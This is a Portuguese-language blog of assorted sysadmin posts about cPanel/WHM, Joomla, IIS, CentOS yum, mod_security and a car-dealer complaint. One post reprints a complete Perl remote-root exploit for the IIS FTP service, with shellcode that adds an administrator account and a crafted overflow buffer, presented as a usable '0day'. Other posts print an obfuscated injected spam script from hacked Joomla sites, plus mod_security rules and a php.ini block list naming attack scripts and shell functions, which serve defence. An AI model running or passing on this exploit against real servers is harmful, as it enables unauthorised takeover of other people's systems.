dnnViewState SPAM Joomla Como resolver (HOW TO SOLVE THIS)

Standard

É comum ver o CMS joomla em suas versões mais antigas sendo trollado por uma chuva de webbots, um dos defaces mais imundos que rodam na atualidade são justamente esses 2 (AVAST Chama-o de CLICKJACK-A — TROJAN):

 

<script type=”text/javascript” language=”JavaScript”>// <![CDATA[

function xViewState()

{

var a=0,m,v,t,z,x=new Array(‘9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’877886888787′,’949990793917947998942577939317’),l=x.length;while(++a<=l){m=x[l-a];

t=z=”;

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t=”;}}x[l-a]=z;}document.write(‘<‘+x[0]+’ ‘+x[4]+’>.’+x[2]+'{‘+x[1]+’}</’+x[0]+’>’);}xViewState();

// ]]></script>

Que normalmente respondem como xVIEWSTATE ou DNNVIEWSTATE, a saída para xViewState e dnnViewState está em localizar os termos em arquivos do joomla, mas 1 em comum costuma ser atacado, o arquivo modules/mod_AutsonSlideShow/tmpl/default.php, limpe a função acima (javascript) e o problema estará sanado!
Reza a lenda que wordpress sofre disso.
Para varrer seu código use o Dreamweaver ou qualquer IDE (até mesmo o terminal) que faça varredura em todos arquivos por um termo em especial (procure por dnnView ou xView) e finish!

Abraços!

WHM sumiu com meus ips adicionados anteriormente e ao tentar adicionar novamente aparece a mensagem is already…

Standard

Calma, sem problemas.
Se conseguir entre como root e rode o seguinte comando:

 

/etc/rc.d/init.d/ipaliases restart

Depois veja no whm se os ips voltaram, caso ainda assim não tenha retornado rode
chkconfig --list ipaliases

Verifique também (caso os comando acima não sanem seu problema) os arquivos:

/etc/ips e /etc/ipaddrpool

Abraços.

 

FIAT + FIORI – UMA PARCERIA DE BABACAS FOREVER ALONE

Standard

A concessionária Fiori, revendedora da linha Fiat em João Pessoa, comercializou em dezembro de 2011 um veículo ‘Novo Palio’, modelo 2012, de placas OFB-7139-PB, com falhas ao cliente José Fernando Santos de Carvalho.

De acordo com o comprador, dois dias após a aquisição do veículo, começaram os intermináveis problemas. Inicialmente, o veículo não deu partida, ou seja, quando a chave de ignição era acionada, o painel não acendia e o carro não ligava o motor.

Indignação
“Procurei a Fiori para solucionar o problema e ‘eles’ (Fiori) não detectaram nenhuma anomalia, informando que o carro estava em perfeitas condições de uso. No entanto, o problema persistiu e eu retornei diversas vezes na concessionária para relatar a mesma anomalia, além de outros tantos, como um alarme de velocidade excedida sem que o veículo estivesse em tal condição. Houve travamento de porta-malas, ponteiro pulando, computador de bordo todo sem regulagem, entre outros problemas”, disse José Fernando.

Medo
O consumidor prejudicado teme pela sua vida e da sua família. Ele revelou que por conta de sua vida profissional, necessita  viajar constantemente. “Eu não posso nem me arriscar, pois não confio mais no Palio que adquiri na Fiori. Vou procurar meus direitos e tenho fé que tudo será resolvido”, desabafou José Fernando.

O outro lado

A reportagem do Paraíba Já entrou em contato com a Fiori, pelo 3208-1512, porém, a ligação passou por diversos ramais e acabou sendo desligada.

Paraíba Já

 

 

=============

 

http://paraibaja.com.br/?p=noticia_int&id=19509

 

Defeito de fábrica em Novo Palio 2012 e o descaso da FIAT

Nos ultimos 3 meses e meio, tenho retornado à Concessionária Fiat varias vezes. O fato é que comprei um carro(NOVO PALIO 2012) com anomalias, que eles nao conseguem resolver. Eles alegam: “O carro está em perfeitas condicoes de uso”.

Pasmem, ja experimentei porta-malas eletrico travado(no dia que ia viajar para ser padrinho de casamento), computador de bordo informando problemas no motor, dificuldades pra ligar o carro, ponteiro do velocimetro “PULANDO”, cortes na ingestão de combustível enquanto em movimento, controle das portas não respondendo e outras falhas na entrega do produto(direção desalinhada, risco no painel, peças alteradas).

Eu ja não aguento mais relatar o problema a empresa ou ficar vários dias à pés, por deixar o carro na Concessionária. Passo por diversos transtornos e incovenientes.

Tenho um filho de 1 ano. Todo pai sabe que “é lei”, chegar em casa e dar uma voltar na rua com o bebe pra ele nao chorar.Ficar se o unico carro da familia é MUITO PROBLEMATICO.

Faço viagems constantes à refice-PE, devido ao meu mestrado na UFPE e tenho MEDO DA INTEGRIDADE FISICA DA MINHA FAMILIA.

Sugiro que NÃO COMPREM VEICULOS FIAT, É JOGAR DADOS COM A SORTE. se o carro sair bem, ok, senão, vc ESTARÁ NO PREJUIZO (FATO).

 

Como remover URLSCan do IIS

Standard

Para remover o URLScan do IIS siga os passos abaixo no windows em inglês:

Start—> Programs—> Administrative Tools —> Services

Pare o IDC.

Agora vamos gerenciar o iis:

Start—> Programs Administrative Tools—> Internet Services
Manager

Dê um duplo clique no servidor e em seguida clique com o botão direito sobre Default Web Site. Clique nas propriedades (Properties).
Procure uma aba chamada ISAPI Filters, selecione UrlScan filter e clique em REMOVE.

Clique em Ok e depois reinicie todos os serviços referentes ao IIS.

Abraços.

Como reparar o firewall do Windows

Standard

use o Regedit!

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch

Query Value;Set Value

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy

Full Control;Read

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Defaults\FirewallPolicy

Full Control;Read
For the DHCP Client service, the issue may occur if the “NT
Service\DHCP” account does not have the necessary permissions for the
following keys:

Registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp
permission needed: Query value, Create value, Enumerate Subkeys,
Notify, Read Control

Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Configurations
permission needed: Full Control, Read

For the “Diagnostic Policy Service” service, the issue may occur when
the account Trustedinstaller is missing the permissions for the key
below:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DPS\Parameters

permission needed: Full Control, Read

Source: http://support.microsoft.com/kb/943996

Full post can be viewed at:
http://www.jasonross.name/2008/12/windows-vista-firewall/

RoundCube não está permitindo excluir mensagens. Pastas Trash, Send e Junk (lixeira, enviados e rascunho) não aparecem

Standard

Se você não consegue ver as pastas do RoundCube “seus problemas SE ACABARAM-SE”.
O bendito, em sua versão stable (quase 100% stable) está com uma linda opção em off (FALSE).

Na pasta …roundcube/config/main.inc.php (se for no ispconfig: /home/admispconfig/ispconfig/web/roundcubemail/config/main.inc.php)
Apresentará este array aqui:

// automatically create the above listed default folders on login
$rcmail_config[‘create_default_folders’] = FALSE;

Salve seu dia assim:

$rcmail_config[‘create_default_folders’] = TRUE;

Pronto 😀

Roundcube fixed!

Regras bacanas do Mod_Security 2 (apache 2)

Standard

Olá ALL,

Uma coisa comum para combater uso indevido de cgi é impedir o uso de cgi (perl) em um servidor de hospedagem de sites compartilhada, mas nem sempre dá para impedir o uso.
Então uma das formas de contornar o uso indevido é aplicar regras do mod_security do apache afim de que possamos filtrar o máximo de requisições e ainda por cima ganhar com segurança.
Antemão quero salientar que uma das pragas mais comuns da web é o DM.CGI, esse carinha faz um estrago grandinho com spam, podendo levar um servidor para as mais conceituadas rbls. Como resolver?

No WHM, como root, siga para o último menu (PLUGINS) e procure pelo Mod Security.
CLique nele, dentro dele clique em Edit Configuration.
Dentro dela adicione as seguintes linhas:

SecRule REQUEST_URI “dm.cgi”
SecRule REQUEST_URI “dark.cgi”
SecRule REQUEST_URI “udp.pl”
SecRule REQUEST_BODY|REQUEST_URI “\.cgi\?m\=state”
SecRule REQUEST_BODY|REQUEST_URI “cgi\?m\=snd”
SecRule REQUEST_BODY|REQUEST_URI “cgi\?m\=icfg”
SecRule REQUEST_BODY|REQUEST_URI “\.pl\?m\=state”
SecRule REQUEST_BODY|REQUEST_URI “pl\?m\=snd”
SecRule REQUEST_BODY|REQUEST_URI “pl\?m\=icfg”

Isto irá salvar sua pele!

fonte: http://www.forumcpanel.com.br/index.php?showtopic=8608&hl=secrule

Lista de funções para desabilitar em um ambiente CPANEL de Hospedagem de Sites compartilhada

Standard


Bem, se você quer mais segurança em um ambiente compartilhado você precisará de ajustar seu php.ini global (/usr/local/lib/php.ini) em seu servidor de hospedagem compartilhada afim de prevenir ataques usando recursos avançados do php.

Como faremos isto?

Procure pela linha disable_functions =

e depois do ‘=’ aplique as seguintes funções:

dl, system, exec, shell_exec, chown, chgrp, escapeshellcmd, putenv, popen, pclose, passthru, proc_open, proc_get_status, proc_nice, proc_close, proc_terminate, posix_ctermid, posix_get_last_error, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_strerror, posix_times, posix_ttyname, posix_uname

Talvez você precisará do shell_exec para o caso do Fantástico Deluxe.
Avalie se vale a pena deixar esta função ativa e prossiga 😀

Exploit para o IIS 6 (FTPD) – BOF

Standard

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = <$sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = <$sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "SITE $v\r\n";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = <$sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = <$sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Gestor de smart trabalha de maneira eficiente no Ubnutu Karmic e revela problemas antes que ocorram

Standard

Uma das coisas que mais gosto no Ubuntu é a sua facilidade de uso e principalmente a forma eficaz que ele gerencia o sistema em si. Estive com um notebook “aposentado” por 4 meses devido a falta do drive de cd-rom (na realidade já não lê nada… rsrsrs). Esperei um bom tempo afim de que uma manutenção fosse realizada (substituição, na realidade era isso) e não consegui achar o bendito drive com preço acessível.

Pensei comigo o que iria fazer, quer fosse um servidor PXE para instalar alguma coisa, quer fosse pegar um drive emprestado (gaveta externa de cd-rom ou cd-rom externo), e nada disso me veio a cabeça.

Pensei em algo mais simples e cheguei a conclusão que instalar o Ubuntu via USB seria a coisa mais simples e amigável do mundo (foi, sem contar a altíssima velocidade, em ver um Celeron 1.5 com 1gb de ram instalado em 12 minutos é de surpreender qualquer peixão).

Após instalar meu bombástico S.O. acabei percebendo que a “aposentadoria” não fez muito bem para o Tux, o smart relatou problemas (coisa que NUNCA iria imaginar, principalmente homem que só vai ao médico quando já está morrendo com dores).

Ao terminar meu upgrade de versão para o Karmic Koala eu startei o S.O. com euforia e ao me deparar com o desktop recebi a notícia de que o disco não estava indo muito bem, por fim, compreendi que apesar da notícia ruim, meu Ubuntu foi mais que um amigo em me avisar o que poderia ocorrer “na calada da noite”!

Segue screenshot:

Este é um sistema amigo, rsrsrs, avisa tudo (mesmo que possa causar uma dorzinha no coração).

Abraços galera!

Como aumentar quantidade de falhas no lfd (csf) para erros de login e senha no whm cpanel

Standard

Para quem usa CSF e deseja aumentar a quantidade de tentativas de acesso no firewall antes que ele dê um lock no ip, basta acessar o arquivo de configuração do CSF e modificar a quantidade de tentativas em:

LF_SSHD = para tentativas ssh,

LF_FTPD = para tentativas ftp,

LF_SMTPAUTH = para tentativas smtp,

LF_POP3D = para tentativas pop,

LF_IMAPD = para tentativas imap,

LF_HTACCESS = para tentativas de acesso por htaccess.
Informe valores numéricos após o  =

Abraços.

Instalando YUM no CENTOS 5 (32 e 64 bits) How to install yum on Centos 5

Standard

Galera, bom dia, faz tempo que não posto, maaasss, abaixo segue tutorial de instalação do YUM no CENTOS 5 (tanto para 32 bits como 64 bits):

PARA 32 bits (i386):

rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/elfutils-libs-0.137-3.el5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/gmp-4.1.4-10.el5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/readline-5.1-3.el5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-2.4.3-27.el5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-iniparse-0.2.3-4.el5.noarch.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/libxml2-2.6.26-2.1.2.8.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/libxml2-python-2.6.26-2.1.2.8.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/expat-1.95.8-8.2.1.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-elementtree-1.2.6-5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/sqlite-3.3.6-5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-sqlite-1.1.7-1.2.1.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/elfutils-0.137-3.el5.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/rpm-python-4.4.2.3-18.el5.i386.rpm # (1)
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/m2crypto-0.16-6.el5.6.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/python-urlgrabber-3.1.0-5.el5.noarch.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/yum-metadata-parser-1.1.2-3.el5.centos.i386.rpm
rpm -Uvh http://mirror.centos.org/centos-5/5/os/i386/CentOS/yum-3.2.22-20.el5.centos.noarch.rpm http://mirror.centos.org/centos-5/5/os/i386/CentOS/yum-fastestmirror-1.1.16-13.el5.centos.noarch.rpm
yum -y update

PARA 64 bits (x86_64):

rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/gmp-4.1.4-10.el5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/readline-5.1-3.el5.x86_64.rpm 
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/python-2.4.3-27.el5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/libxml2-2.6.26-2.1.2.8.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/libxml2-python-2.6.26-2.1.2.8.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/expat-1.95.8-8.2.1.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/python-elementtree-1.2.6-5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/sqlite-3.3.6-5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/python-sqlite-1.1.7-1.2.1.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/elfutils-libelf-0.137-3.el5.x86_64.rpm
rpm --nodeps -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/elfutils-0.137-3.el5.x86_64.rpm
rpm --nodeps -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/rpm-4.4.2.3-18.el5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/rpm-python-4.4.2.3-18.el5.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/m2crypto-0.16-6.el5.6.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/python-urlgrabber-3.1.0-5.el5.noarch.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/yum-metadata-parser-1.1.2-3.el5.centos.x86_64.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/python-iniparse-0.2.3-4.el5.noarch.rpm
rpm -Uvh http://mirror.centos.org/centos/5/os/x86_64/CentOS/yum-fastestmirror-1.1.16-13.el5.centos.noarch.rpm http://mirror.centos.org/centos/5/os/x86_64/CentOS/yum-3.2.22-20.el5.centos.noarch.rpm
yum -y update

Abraços.

PHP 5.2.11 LIBERADO! Cpanel Já fez barulho quanto a isto hein!

Standard

Galera, para quem gosta de manter-se atualizado, a Zend (pai do php) lançou juntamente com a equipe de desenvolvimento o php 5.2.11. Vale a pena o update devido a quantidade de bugs corrigidos.

http://www.php.net

Para os usuários de cpanel o easyapache já está liberando disponibilizando junto ao whm, vide:
http://changelog.cpanel.net/?treeview=easyapache

embedded by Embedded Video

Download Video

Quando tudo estiver para baixo (down) use yum-allowdowngrade!

Standard

Bom galera, o nerd aqui vai postar algo um pouco interessante para quem usa Red Hat/Centos/Fedora (e based) e usa o yum para fazer manipulação de pacotes e etc. Se você tem a necessidade de DownGrade de qualquer coisa que instalou no server, principalmente se usou yum, nada de problema, siga os passos abaixo e seja feliz (faça os passos abaixo como root):

yum install yum-allowdowngrade

Após, precisamos habilitar o yum para fazer downgrades, neste caso:

vim /etc/yum.conf

vim /etc/yum.conf
# show all available packages, not just latest
showdupesfromrepos=1

Após, vamos ver um exemplo:

yum list speex speex-devel

Installed Packages
speex.i386 1.0.5-4.el5_1.1 installed
speex-devel.i386 1.0.5-4.el5_1.1 installed

Available Packages
speex.i386 1.0.5-4 base
speex-devel.i386 1.0.5-4 base

Vamos remover as coisas antigas:

yum remove speex speex-devel

Agora instalamos a coisa:

yum --allow-downgrade install speex-1.0.5-4 speex-devel-1.0.5-4

E para garantir que a coisa não será atualizada após update do yum:

vim /etc/yum.conf
# do not show all available packages, just latest
showdupesfromrepos=0
# exclude packages from updated
exclude=speex speex-devel

como Meu servidor não requer autenticação whm cpanel como forçar autenticação de email how to force mail authentication

Standard

Nada de pânico, entre no console como root e digite o seguinte comando:

/usr/local/cpanel/bin/tailwatchd –enable=Cpanel::TailWatch::Antirelayd

😀

fonte: http://littleoak.wordpress.com/2009/08/01/meu-servidor-nao-requer-autenticacao-whm-cpanel-como-forcar-autenticacao-de-email-how-to-force-mail-authentication/